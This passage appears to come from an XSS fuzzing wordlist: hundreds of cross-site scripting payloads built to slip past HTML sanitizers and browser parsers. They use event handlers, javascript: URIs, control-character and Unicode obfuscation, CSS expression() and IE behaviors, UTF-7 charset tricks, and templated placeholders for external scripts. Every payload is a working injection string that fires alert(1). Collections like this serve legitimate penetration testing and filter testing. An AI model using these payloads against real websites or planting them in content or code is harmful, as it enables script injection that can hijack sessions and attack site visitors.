onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> 